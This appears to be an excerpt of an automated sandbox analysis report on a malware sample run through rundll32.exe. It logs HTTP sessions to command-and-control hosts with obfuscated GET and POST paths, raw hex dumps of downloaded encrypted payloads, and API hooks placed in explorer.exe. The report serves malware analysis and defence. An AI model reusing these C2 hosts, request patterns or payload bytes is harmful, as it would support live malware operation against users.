                                                      Sep 10, 2021 07:02:18.025011063 CEST5275INData Raw: cb 76 37 ad af d4 4b 5f 3c ad 14 bf fa 70 87 21 e1 91 5a 60 f4 09 f0 76 51 e8 fd a1 65 fc 4c ee 32 94 36 e2 42 d4 1f 40 a9 2f 89 e6 8c 6e bf 1a 75 dc b0 f3 5f 45 79 97 ee 10 0b 25 d3 18 b2 d6 9b e7 87 c4 d5 5e 5a a3 ca 83 93 ff 86 d7 17 1c 8d 5d
                                                      Data Ascii: v7K_<p!Z`vQeL26B@/nu_Ey%^Z]y|f<xW50>sDE5R#6W,p^+T#@!3Y9V23C6_"00iMs>T6[BY/
                                                      Sep 10, 2021 07:02:18.025024891 CEST5276INData Raw: cb 27 c2 5e 54 d1 50 56 2e f1 f4 43 33 52 6d 04 fe c4 c5 6e d2 0f f2 79 96 89 84 7c 5d 04 88 6c 0a 58 ad 23 04 cf 77 2c 5b c9 b1 d0 03 99 9e b6 92 83 c5 dc 78 69 5c 88 43 5b 8b 94 46 c4 e5 3e e8 fc df 10 69 50 1b df 1c b4 6d 29 3d 65 42 b8 74 1e
                                                      Data Ascii: '^TPV.C3Rmny|]lX#w,[xi\C[F>iPm)=eBt ~rrpju(%bQV8aq"kOsAyBTTEP)tFoHG+k+;V'w%[`tVJoC6HFK(RoL
                                                      Sep 10, 2021 07:02:18.025038958 CEST5277INData Raw: ad fd 60 50 6d 82 ae 3e 9c 22 4e ae 89 42 bb 1d 0d d9 c6 3f 9c 1e 4f 33 a6 b6 97 01 38 8e 7b ee 7b a3 1f 28 19 55 0a e8 e1 1b e6 62 cc 6f a5 1a 7b 12 d0 c6 ed ac 84 5a d4 ea af c3 30 fb cb 52 e7 ed ec 65 de 00 ff 56 57 9d 95 f0 91 e8 38 0b d2 20
                                                      Data Ascii: `Pm>"NB?O38{{(Ubo{Z0ReVW8 x%MF# ocj(l0B=9T."Xcp2kI%`d.,C&-Ja!Mie'X)6$cN$l$t^9
                                                      Sep 10, 2021 07:02:18.025528908 CEST5279INData Raw: 90 18 dd 7e 29 1e f4 88 b7 57 2c e5 52 91 9b ae 93 09 61 24 b1 07 56 10 7d 3b 43 25 61 4b 35 4e 59 cd 10 3f 8d 49 ab 4c 7a 3e 9c a5 41 5a 39 d1 f2 5e 2a ff b2 68 bc 3f 81 f2 42 62 dd 33 6e cd ec 7e 9b 28 67 54 7d 27 ad b2 39 12 b5 7c 39 7f 6e 9c
                                                      Data Ascii: ~)W,Ra$V};C%aK5NY?ILz>AZ9^*h?Bb3n~(gT}'9|9nA6~E6]*ZGW(0Q2y*sm=KPG}OZIFAa;8'@>pKW2j{4/!gdv>Q)-;*
                                                      Sep 10, 2021 07:02:18.074362040 CEST5280INData Raw: 1a 24 f4 75 76 e8 bf fb 36 48 64 f4 f9 b4 63 aa 94 da 2e a0 34 29 56 b2 63 09 b3 b6 30 4e 1b e4 ad 9c ca e9 11 8e bb ab c6 b3 f3 b4 a3 21 b2 35 e4 16 29 c9 dd a7 74 52 44 cb c4 fe 43 ea b5 fa 91 a0 de aa 01 20 cb a8 9f 17 52 aa 5d 80 b3 1b 9f 6c
                                                      Data Ascii: $uv6Hdc.4)Vc0N!5)tRDC R]l&ATo!%-r<u:*5DNA@7V(E!fh;amzHA.qBOrjA=`n5:UJu=gLw^X% C1Bjck<o@6yu


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.349791185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Sep 10, 2021 07:02:18.547163010 CEST5468OUTGET /JWEVOwMBnh_2FtPS/WMS3RPVZyjTSnTq/9Hxp202Yz5PgJEOrB6/nF_2FNmSa/SQyIRZk5j_2B3OcT7rdM/7npsCxfJSu8JbD_2FiM/y1HBEgDsmQFEPX27nGHHbz/zR0jF_2FnlVo0/Nxk3zALE/ofyPMDXzWjS1IpBinC5Sz4W/cf_2F5pD8G/46Dgl0akFp2cXbFnY/HwtGCbH5Q64m/f9VXk69LnhQ/x_2B8W86eQh4Rn/mNr7OMCC6GA9c9ph_2Bg7/ddhYlIa8YUPQgtGC/8R2fSBf4sQLaQ_2/FLycNJhDT_2FxWMMIH/41wPmVaCG/UdSw_2BuW4yZulffApAL/Gvq14U65qaj/9np83 HTTP/1.1
                                                      Cache-Control: no-cache
                                                      Connection: Keep-Alive
                                                      Pragma: no-cache
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                      Host: atl.bigbigpoppa.com
                                                      Sep 10, 2021 07:02:19.014877081 CEST5470INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 10 Sep 2021 05:02:18 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 247965
                                                      Connection: close
                                                      Pragma: public
                                                      Accept-Ranges: bytes
                                                      Expires: 0
                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                      Content-Disposition: inline; filename="613ae6daf07a3.bin"
                                                      Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                      X-Content-Type-Options: nosniff
                                                      Data Raw: df af 1f 2c c7 7a 76 2e c4 65 52 d8 c5 96 95 66 6a 34 f7 62 f3 c6 81 d9 07 0e bc 4f 56 08 9d 0e 1c 30 b4 bc 8a 54 30 49 14 87 4f 11 78 79 9f a5 a3 c1 f0 f2 71 2a ab 5d ad b6 19 fb 7b e5 e8 5b b1 62 55 09 08 fa c4 b5 12 c3 58 e0 61 dc 69 59 43 ce 7f 7f be b9 36 0f 6f 2d cb 03 0c d4 8d ae 5e 2a 57 59 70 5a c4 7f 2f 72 cd e3 ba d8 80 d9 b2 c2 8d 36 2b 7d ec 9a d1 b3 92 2d dc 89 30 84 5d 9f f1 67 43 50 67 cc 6a 54 29 3d d6 af a8 16 68 8b 15 cd 1d f4 eb 98 08 70 c8 a5 8a c3 af e2 e1 69 de 42 28 d0 e9 c8 68 6d 52 20 18 a9 57 02 5d 75 76 9a 12 b6 c4 3e 11 ce 5b da e7 66 f2 d6 01 98 15 84 59 bf 42 3a e6 5e dd 98 29 46 a9 d9 33 3a 8d 4f f4 ac 9c ba 0f 5a 3d 9b 82 78 38 73 e6 b5 cc fe 07 e1 cd 3d c3 bc bd 64 86 62 56 ad c9 8a 57 f7 4e 67 9c 19 37 56 46 21 d2 be ee 2a 75 32 18 f6 b7 17 1d 9f bb 4d 5f 52 cd 18 c5 8e 3c 94 fc 59 3b 5a bb af ad d5 e6 75 99 11 80 40 1a fa fd 9d 25 e5 7b f8 e3 92 5d 13 32 74 46 66 44 f4 f3 8e 21 47 18 9c 4c 91 b6 41 4b 4b f0 af 08 9e f3 4c 5a 25 fd 03 1e b2 09 8f 24 8f f6 be a3 52 9b c9 e9 0c 6a 62 9b 77 94 dc 2f 41 cd cc 76 66 e6 fc 0e 5e 3c 65 ba 6c a0 7b c9 40 af 6e ee 00 e7 c5 62 5e 5d d7 40 0e 9e c3 cb fb 58 34 6e 3e 7e ca 8a 3c d4 5b 01 fc 92 41 bc 19 55 5a 7a 2f 0d 15 e4 db e0 04 58 d9 17 09 24 0f a9 87 2a 33 ff 80 96 5e 10 c5 23 08 84 8b 27 d8 28 72 98 80 ed 0b c1 94 72 4e 1a 87 af 77 e2 f9 55 74 96 83 c4 50 e0 0e da b4 d5 27 2b e9 09 c7 ee e3 3f 06 68 a6 63 ab 09 16 3c 1e c7 a0 69 47 d9 36 00 08 83 b2 99 76 9f f6 8b 62 b1 d9 f4 c3 ed 59 1f 04 14 ef ea 3d 35 8e 61 6b 5f 69 f4 c1 5a 8a e1 c4 28 46 cf 23 fb a9 a8 b3 2e fc 57 52 94 15 c3 0a c3 12 34 b6 d8 a0 0b 1f c0 f2 12 4f 3d 45 b7 9d 3b cf c5 79 c6 be 37 15 1c 53 e5 dc 3e fc 42 e0 4e 9b 3e c4 e6 64 a3 74 23 83 d6 07 0c e1 6b 62 e1 6a a5 7e f7 ca 83 67 30 f8 8a cc c6 47 e6 8c d3 c5 6c 79 f6 f7 79 8b c2 a5 5c 6d 45 a3 37 8d d8 fc d8 99 ef 07 b0 9b 39 83 ff bc b0 6f 4e 5d f9 62 10 42 d6 c8 58 f9 f0 56 ac 6a 96 46 1d f0 6b bd f8 b2 82 69 29 9f a3 fa a7 f4 b5 96 17 09 74 01 5a 9b f5 e1 89 8a dd 96 5c 77 36 9b 1b fe 72 df 5e 6a 1a d5 ff 61 62 fd b1 ea 2d 89 fb d1 11 5c 30 cb ea 6e 42 2d 36 34 c8 a1 93 06 33 c5 8a 81 a6 4a de 57 53 65 11 e7 9c 9d ea 6e aa dc f9 0e 90 ec 29 c5 9f 4e 6b 47 01 13 61 05 77 55 a1 0e 96 ee 2a ed 63 85 62 93 f3 51 68 dd c4 79 b3 40 6f 8f e4 29 2e 5b 5b 31 95 9f 22 ed 22 00 05 35 fa b5 f2 91 73 fa 06 ca c4 85 6f ea 84 12 6f 1d cc e0 7a 7a 41 f5 16 df 63 f2 ce c2 cd 0d f2 fa 10 24 6a e1 e0 fb 5f 7f 4b 0c 50 5d 71 d6 63 38 66 6e f0 ea 85 52 52 f4 4e 32 da 21 a9 2a 30 1d 58 1f 70 0d af 01 71 28 de b7 26 ed 97 36 ca 6b 7e 0b c6 08 74 65 f1 77 c1 28 ab a4 6b 08 e7 fc 68 59 3e 8c 41 10 b0 98 01 4e 57 f8 11 ba 47 df 3d 97 d6 1e 49 e2 f4 66 c3 68 ae 75 3c 6b 70 74 9c 71 ff c1 59 88 e7 ac 4d c7 c5 19 5a 24 6c 08 13 7c d9
                                                      Data Ascii: ,zv.eRfj4bOV0T0IOxyq*]{[bUXaiYC6o-^*WYpZ/r6+}-0]gCPgjT)=hpiB(hmR W]uv>[fYB:^)F3:OZ=x8s=dbVWNg7VF!*u2M_R<Y;Zu@%{]2tFfD!GLAKKLZ%$Rjbw/Avf^<el{@nb^]@X4n>~<[AUZz/X$*3^#'(rrNwUtP'+?hc<iG6vbY=5ak_iZ(F#.WR4O=E;y7S>BN>dt#kbj~g0Glyy\mE79oN]bBXVjFki)tZ\w6r^jab-\0nB-643JWSen)NkGawU*cbQhy@o).[[1""5soozzAc$j_KP]qc8fnRRN2!*0Xpq(&6k~tew(khY>ANWG=Ifhu<kptqYMZ$l|
                                                      Sep 10, 2021 07:02:19.014935017 CEST5471INData Raw: f4 6e 6a 4e d0 ed f9 c2 d6 48 f6 5d a4 cd 88 a0 7d a4 7a 3c ca 11 a5 f8 58 b1 68 a1 84 53 16 ca 27 7d 6f 29 ca 7e 81 83 c1 46 b5 aa a1 98 ba e0 da ea 2f 8e 2b 13 dd a4 37 f1 c3 a6 e2 3a b8 ce 67 61 91 65 04 7c f6 0b fe 7c f3 8f 07 d6 b1 2c c6 9f
                                                      Data Ascii: njNH]}z<XhS'}o)~F/+7:gae||,zm~q[V3fmGRxDJ.R{:6ei^.(g`P=%-^|8.:#fd'k&]XPwgo&lay@z
                                                      Sep 10, 2021 07:02:19.014972925 CEST5472INData Raw: b3 98 00 21 bc 95 5e d5 6d af 05 fe 44 67 47 8d aa a4 76 3e d0 24 e5 20 03 d3 ba b9 03 81 b9 fe 67 13 51 e6 27 f0 8c fb c5 44 14 1f 6a c6 d4 c3 4b ab 43 50 c7 8c 1c fd 25 12 95 1b 09 04 07 92 42 2e 31 1c 8f 56 92 b2 95 b8 ed 7b 52 97 10 73 f3 23
                                                      Data Ascii: !^mDgGv>$ gQ'DjKCP%B.1V{Rs#S^l:Zf@YN2kISR2YiqM<&!#W`G@{T xeFX\ge _ja-hAAm}LPj5o}=*^1Uf
                                                      Sep 10, 2021 07:02:19.015021086 CEST5474INData Raw: 38 e9 6a 27 59 42 f3 5d 29 71 d1 dd da b0 01 0b ba 98 66 3b bf 97 2b 0a a4 e1 a8 c4 d9 0d 0b f9 b7 b5 96 2c c8 f1 c5 dc 59 e4 8d 04 46 a3 46 d7 90 10 52 30 11 4f f2 55 d3 89 b2 13 d6 f2 3c d3 50 f7 33 98 a4 e7 4a 22 b6 e4 3e 4d 06 f9 91 84 75 9f
                                                      Data Ascii: 8j'YB])qf;+,YFFR0OU<P3J">Mu280!5(JB@#!)2`e K-FqE-^@Wp-Ek,r.r"!PB?74Mg-Gk!yh(Y@*(\A
                                                      Sep 10, 2021 07:02:19.015063047 CEST5475INData Raw: d9 cf 09 aa b9 be 50 41 7f 12 41 b1 3b 7b fb d6 c2 20 34 8b 75 fa 03 bb 6a df 9a eb 06 22 75 37 a6 2b 68 e4 9e ed f4 61 83 6a ce 56 e6 2a 7c 7c 79 cc 7b b4 9f 18 2d b0 09 ed ee e0 58 d4 97 01 26 f0 c8 3a df 9a bb 7e 47 2c 41 e4 8e f1 fc ef 81 10
                                                      Data Ascii: PAA;{ 4uj"u7+hajV*||y{-X&:~G,A. gUAL6X|!_H||ry42xFS+}P}TF+w2_!([=ZrN>|u#='nl+1Q62[g0,oJ1fN)
                                                      Sep 10, 2021 07:02:19.015100002 CEST5476INData Raw: c8 4e 63 ee 60 a4 01 ce 13 37 95 97 5d 83 4e 99 3e cd 35 51 54 d4 c4 7c 03 1c 4c 85 b0 1b 36 64 4a e7 7e a3 9c 8a 8a c0 2e 3b 04 8a 1a 14 18 5e 08 72 8d dc 9b 9d 4c c6 b6 22 53 c0 8e b1 a4 0b 17 6a 10 25 23 fa 16 f8 37 26 d5 4d 72 5f e5 17 3a d9
                                                      Data Ascii: Nc`7]N>5QT|L6dJ~.;^rL"Sj%#7&Mr_:Z'TNst)L$&.MzG?e^lww8l&O\3A)Ve\af8DSuoU"6Hao"\"c\]2=\)
                                                      Sep 10, 2021 07:02:19.015185118 CEST5478INData Raw: f7 f7 58 28 cb 92 af a2 df bc 90 3a eb 10 51 5c a0 7a 44 73 66 72 5f b0 0e 8a ac 42 44 cc a9 cf 80 44 14 a0 ca 54 50 c2 b8 46 0e f4 af 2f d7 03 af df 30 b1 e2 59 af bb 77 e8 a3 cd cf 47 f2 ef 5a 47 1c 92 aa cd 94 7c 78 dd 5f 08 90 0f d4 3c ca 30
                                                      Data Ascii: X(:Q\zDsfr_BDDTPF/0YwGZG|x_<0'8XSsl|S{#0.6yb+@NVGo??(T>\0rX\2_ri$T<F!k1Z(GuT{j1P
                                                      Sep 10, 2021 07:02:19.015228033 CEST5479INData Raw: 73 cb 9e 03 f2 05 21 3d fe 3c b0 36 d1 07 15 a7 50 44 97 bd 2b 4c e4 77 21 90 b9 3a 39 2c 26 32 79 4b 86 02 b5 2a eb 06 ca 15 90 42 e0 6d 0c 70 03 38 54 50 b6 ff b2 fa 63 6e 76 a2 bf d2 9e 0c f4 96 e3 98 4f 57 fc 92 be 98 5c c7 27 88 53 d9 85 3a
                                                      Data Ascii: s!=<6PD+Lw!:9,&2yK*Bmp8TPcnvOW\'S:*R_=7.9)Z$OW2,$#,VkWPPVQB2@\l,Xp7iw :y/O=bT4_-%tLX>C/]i/p\pwfT
                                                      Sep 10, 2021 07:02:19.015266895 CEST5481INData Raw: 81 68 bd 15 46 05 e3 72 36 26 e3 a3 58 f9 9e 5c e7 5d 52 c1 e5 ea 8a 35 b9 4a 48 45 89 31 7a 06 21 42 92 dc b4 68 c8 5c 76 16 2e 40 02 71 55 be 9e 4a f7 a2 b4 db e2 a6 48 d7 0a f2 88 27 6b 0b 29 e1 4b 21 c4 5c 65 26 71 5b 07 0d a9 84 b6 c8 78 57
                                                      Data Ascii: hFr6&X\]R5JHE1z!Bh\v.@qUJH'k)K!\e&q[xW&Jw?auy&Ac'59AV##Iv)~ev{\H#w/N+ k9^?xV*npr=vR'e0'+R421W
                                                      Sep 10, 2021 07:02:19.015583992 CEST5482INData Raw: 09 d8 71 72 9d ff 25 bc e9 f6 f2 45 47 87 e5 96 c7 5a 82 05 3d 5d 08 53 0e 2b 51 bb 92 db da 21 15 38 a1 75 f5 64 a6 73 f0 11 e7 a0 56 af 82 3e b9 a8 ee 97 49 a9 9f fd 4b c7 53 56 83 94 1e 21 b4 1e e7 e7 37 01 3b 6d df fe 42 d1 f6 93 83 5c 52 64
                                                      Data Ascii: qr%EGZ=]S+Q!8udsV>IKSV!7;mB\Rd[i+E?u*msU4.Ay:Bd^eYhKlq=`{I#XqOXhM<Ne/b$wU<4LU4s]ZVuNzY
                                                      Sep 10, 2021 07:02:19.064390898 CEST5483INData Raw: 3c 47 62 fe b9 d6 6c 6b ef e1 b0 74 c8 2a 47 58 de ec 3e 8a 38 6d ed 47 8f 47 5b d7 06 62 d4 b4 3e b4 47 4f 91 49 6f da 46 7a 6a 15 18 a0 19 43 fe 97 51 cf 98 96 42 25 40 90 e9 27 4c 46 86 56 cf dc f7 a7 4d 4b d5 3d 85 02 a9 e6 46 a7 2b 89 03 69
                                                      Data Ascii: <Gblkt*GX>8mGG[b>GOIoFzjCQB%@'LFVMK=F+imR[H4kOQ]P(Z>)0Fl0%l}UmsM6,Gf@"e^-gB[:k[/uz2wL5,Rw_I'\>U$1_=r!7#/ozEMK=*aD>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      2192.168.2.349792185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Sep 10, 2021 07:02:19.594026089 CEST5727OUTGET /gO6fEM48Z2VyJYyEaQk/Tlg2ka7bPKYxRb_2B442I_/2FFZLVL8c_2BN/KPEiurg_/2FQFW58y_2BC5_2BoQJsMfC/Z20kSl3bCK/Qe_2BCo_2BI8EhVfz/gaTQA1FJpKmh/Okd_2B3iR1p/U_2F_2F_2BxYfZ/z_2B8obDRzLj_2BvPtXpS/MutYXow3kjfHv8Ne/Tk41k1QbLs08co6/pw6aojLzb_2BsMklC7/1luisc2vx/yYmG1Q6eqChu6qOfd2lR/zgadpa0en2mVI5QE7we/rWllKXh4B6iqFxDAWQqk8G/Oj17QsJan3SWq/MhUPAmuR/Yiolc5JDgbwuOe67l9VgfXi/kgInUUiADdo06Z7N/8 HTTP/1.1
                                                      Cache-Control: no-cache
                                                      Connection: Keep-Alive
                                                      Pragma: no-cache
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                      Host: atl.bigbigpoppa.com
                                                      Sep 10, 2021 07:02:20.036945105 CEST5728INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 10 Sep 2021 05:02:20 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 1958
                                                      Connection: close
                                                      Pragma: public
                                                      Accept-Ranges: bytes
                                                      Expires: 0
                                                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                      Content-Disposition: inline; filename="613ae6dc004be.bin"
                                                      Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                      X-Content-Type-Options: nosniff
                                                      Data Raw: e9 b6 e3 58 66 dc 15 e4 80 de 6a 7c ed d6 c7 9c 13 7d 2c 30 77 87 0a 58 42 4f 0c 73 1f 5e 59 8b 56 46 5d 4a 82 ce db d3 96 28 96 67 b2 d9 1f 00 59 45 b0 8c b2 61 18 2b 75 9c 48 e8 bf 1e 63 6a 93 01 16 d9 d4 d8 0c 1b 0c 86 dc 63 18 46 b6 8f 9b 93 82 62 69 05 d5 22 40 61 ec 38 93 63 30 cf 27 cf b5 5a 73 96 99 fb 5a 58 26 be 6b cf 20 54 04 07 86 78 37 b8 dc d2 3e 0a 51 0a 93 2e 44 c6 45 b5 97 49 ae 63 08 c1 9a b7 91 3c 36 23 9e 3b 96 a6 8e 27 f3 ae 6d 81 74 d0 a5 ee 42 c9 6e 24 9c 79 77 39 30 c5 ec 88 f0 e0 9d 50 5a 4c 58 4b f3 76 c5 32 5d 99 91 e6 92 45 c8 f0 57 ba d4 51 09 eb 9c 83 ba 5a 63 eb f9 7b bd 94 1e 50 13 84 5b e2 3e 83 f5 22 fd f7 a5 d5 c0 c8 96 9b d1 89 d4 ff 01 22 42 23 46 76 98 d8 4e 56 a0 2f 0d 4a 4d 5d dc a7 4c 96 0f 80 0b 1e 9b 14 eb ce d5 55 5d 16 1b 47 1e 1f a9 b5 09 9e 3b 23 36 8d b3 e8 1d 28 5c f9 37 96 7c a1 c3 f5 07 66 93 ee f9 bb 51 93 46 d0 db b5 0b 9a c3 20 06 22 22 e4 f0 c2 9c 88 3e c3 31 5f 69 91 2c c2 59 c2 97 3a 61 33 85 fb b9 24 5f e1 e8 cf b8 e3 35 49 b3 47 1b b8 85 13 13 5d 52 2f e4 3d e9 1e f8 5d c0 92 68 34 a9 42 63 94 9f f4 75 15 d2 f9 0e f7 66 3a 25 73 77 bf 67 ff 68 e9 69 1a 8b 64 84 99 dc cb 68 2e d3 d5 fe 14 6c 30 11 29 61 8c 54 d8 17 6a cb 99 62 90 fc f1 30 cd 6d 51 80 9e 75 62 c1 1c 7c 57 58 13 3b 80 77 28 fd 65 bc 66 c2 a7 31 79 83 9a 47 db 81 bb 35 2f 99 6d ba 2d e0 66 0e 08 a2 70 b9 83 3b 89 0b d3 35 82 68 71 06 0b 96 ce 50 4d e4 4f 7c 23 88 92 17 23 c4 07 bb 49 7f 90 42 e4 bf ad cb cb f1 df e8 96 37 66 4f 9e b3 4a d6 5f 60 90 f2 c4 48 9a b3 c1 e1 eb 37 68 39 7a bc 39 fa 83 97 35 b0 cc 5c e1 53 7d a5 5d 6a 46 58 4e 9d bc fd 4f 3d 45 61 4d 82 5d b3 10 69 48 c1 b2 70 04 dc 93 d8 3c 56 a3 d5 ee 7e 44 ca 1e 61 34 d1 c7 f1 a0 92 15 f3 f3 36 c8 6c ea c3 8e 25 3f 86 c1 a0 75 9f cc 7c 43 24 32 f7 8d 06 b5 06 d1 10 f0 43 fa 6b f5 9c 55 fd dd 68 55 7d c7 be e4 c7 3f d6 77 a6 c1 45 1b ba 8b 0a 49 30 a4 cd 6b ad 96 e8 47 a7 f2 6a d2 3e 01 6f de d4 5a 0e 02 e8 d7 fd f8 a3 aa 82 be 26 06 29 29 09 d5 da 13 c1 75 c7 79 88 5d 50 40 66 65 8f b4 05 60 0f fb df 9a dc 52 f1 6a 63 6a bc b3 a6 8a 16 e7 3d a4 a8 34 13 44 aa 5a 2d e6 36 c9 2e bd 77 65 3b b9 50 e7 99 90 45 30 32 db 1d 21 50 ea a2 ee 3b 31 cc c4 af 6d 00 78 ac d7 f0 c2 69 59 02 f7 00 c9 6c 34 d8 4b b1 ae 6d 03 fd f7 1a 3e 5c 32 39 e7 6c 03 88 59 35 98 18 6c b7 40 cc da 2f 04 5f bf 74 8d c4 d0 d1 07 7c 15 cb aa a4 c7 a9 1c 38 25 69 b5 02 1a ab d3 d2 4f 0f 5c 4b b7 35 83 f2 62 3b f9 cd 8c ae a7 f0 9c 1c 31 eb ce 61 97 43 71 13 59 7d ae 6a e6 44 ae 7a 26 c7 83 78 11 a7 15 59 ec e2 f5 f1 32 46 57 ca ec 7d 98 3c 7a c4 6a 15 38 62 ec 4f d3 da 63 c5 8c 7c 6f 3b 34 3f ec 97 c7 99 0b f4 6f 3e 13 27 05 f1 80 9e d1 1b 64 98 22 e7 ea ed 98 35 98 c2 d5 07 34 43 40 b4 bb 67 43 35 a8 23 ca 1d ca 12 66 6a 7e 03 2d d4 61 26 b4 1d b6 cd f9 0b c6 7f
                                                      Data Ascii: Xfj|},0wXBOs^YVF]J(gYEa+uHcjcFbi"@a8c0'ZsZX&k Tx7>Q.DEIc<6#;'mtBn$yw90PZLXKv2]EWQZc{P[>""B#FvNV/JM]LU]G;#6(\7|fQF "">1_i,Y:a3$_5IG]R/=]h4Bcuf:%swghidh.l0)aTjb0mQub|WX;w(ef1yG5/m-fp;5hqPMO|##IB7fOJ_`H7h9z95\S}]jFXNO=EaM]iHp<V~Da46l%?u|C$2CkUhU}?wEI0kGj>oZ&))uy]P@fe`Rjcj=4DZ-6.we;PE02!P;1mxiYl4Km>\29lY5l@/_t|8%iO\K5b;1aCqY}jDz&xY2FW}<zj8bOc|o;4?o>'d"54C@gC5#fj~-a&
                                                      Sep 10, 2021 07:02:20.037009001 CEST5730INData Raw: 84 18 68 9e a5 53 64 63 58 36 8b 7d 64 e9 c3 31 4f 96 ee a1 e9 88 86 29 07 99 d1 6e c6 04 b3 b1 3f 02 5e 26 28 b0 bd 78 d4 6a 7f e9 d5 24 a7 d0 c0 cf e1 28 9b 14 b8 a2 d6 08 80 f8 e7 c8 2d cd 27 bc bd d8 80 a4 50 ed 16 5e 36 56 5c d5 00 7f d8 31
                                                      Data Ascii: hSdcX6}d1O)n?^&(xj$(-'P^6V\1zo,g}C 7BAX?@y)g9Gk-1*w"_I#@t"p=IPk FBzD5h;+R!B'\EfO475*)Jb2/iTrkrw!


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      3192.168.2.349793185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Sep 10, 2021 07:02:44.225999117 CEST5731OUTGET /fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r HTTP/1.1
                                                      Cache-Control: no-cache
                                                      Connection: Keep-Alive
                                                      Pragma: no-cache
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                      Host: art.microsoftsofymicrosoftsoft.at
                                                      Sep 10, 2021 07:02:44.743824005 CEST5732INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 10 Sep 2021 05:02:44 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                      X-Content-Type-Options: nosniff
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      4192.168.2.349794185.251.90.25380C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Sep 10, 2021 07:02:45.111639977 CEST5733OUTPOST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1
                                                      Cache-Control: no-cache
                                                      Connection: Keep-Alive
                                                      Pragma: no-cache
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                      Content-Length: 2
                                                      Host: art.microsoftsofymicrosoftsoft.at
                                                      Sep 10, 2021 07:02:45.111676931 CEST5733OUTData Raw: 0d 0a
                                                      Data Ascii:
                                                      Sep 10, 2021 07:02:45.626944065 CEST5733INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 10 Sep 2021 05:02:45 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 146
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function NameHook TypeActive in Processes
                                                      CreateProcessAsUserWEATexplorer.exe
                                                      CreateProcessAsUserWINLINEexplorer.exe
                                                      CreateProcessWEATexplorer.exe
                                                      CreateProcessWINLINEexplorer.exe
                                                      CreateProcessAEATexplorer.exe
                                                      CreateProcessAINLINEexplorer.exe
                                                      api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                      api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe

                                                      Processes

                                                      Process: explorer.exe, Module: KERNEL32.DLL
                                                      Function NameHook TypeNew Data
                                                      CreateProcessAsUserWEAT7FFB70FF521C
                                                      CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                      CreateProcessWEAT7FFB70FF5200
